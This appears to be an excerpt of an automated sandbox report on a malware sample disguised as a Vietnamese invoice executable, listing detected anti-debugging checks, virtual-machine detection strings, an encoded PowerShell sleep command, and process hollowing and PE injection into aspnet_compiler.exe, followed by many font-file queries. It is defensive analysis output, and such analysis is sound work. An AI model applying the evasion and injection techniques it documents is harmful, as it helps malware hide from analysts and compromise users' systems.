Source: Shhejayly.exe, 0000001C.00000002.534013224.000000000091B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
Source: Shhejayly.exe, 00000012.00000002.528271926.00000000007FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.353332001.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.528271926.00000000007FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: aspnet_compiler.exe, 0000000C.00000002.524221761.0000000001367000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\oy

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 14_2_00418981 memset,GetSystemInfo,

14_2_00418981

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 12_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	12_2_100010F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 12_2_10006580 FindFirstFileExA,	12_2_10006580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0040AE51 FindFirstFileW,FindNextFileW,	14_2_0040AE51

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

14_2_0040DD85

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 14_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,

14_2_004044A4

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 12_2_10004AB4 mov eax, dword ptr fs:[00000030h]

12_2_10004AB4

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 12_2_10002639 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

12_2_10002639

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 12_2_1000724E GetProcessHeap,

12_2_1000724E

Enables debug privileges

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 12_2_10002639 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_10002639
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 12_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_100060E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 12_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_10002B1C

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Encrypted powershell cmdline option found

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process created: Base64 decoded start-sleep -seconds 20
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process created: Base64 decoded start-sleep -seconds 20			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section unmapped: unknown base address: 400000	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 456000	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 46E000	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 474000	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 475000	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 476000	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 47B000	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: F55008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: aspnet_compiler.exe, 0000000C.00000002.533978601.0000000004032000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerF
Source: aspnet_compiler.exe, 0000000C.00000002.533978601.0000000004032000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: aspnet_compiler.exe, 0000000C.00000002.534251158.000000000403F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.534069193.0000000004037000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000003.477736669.0000000004001000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
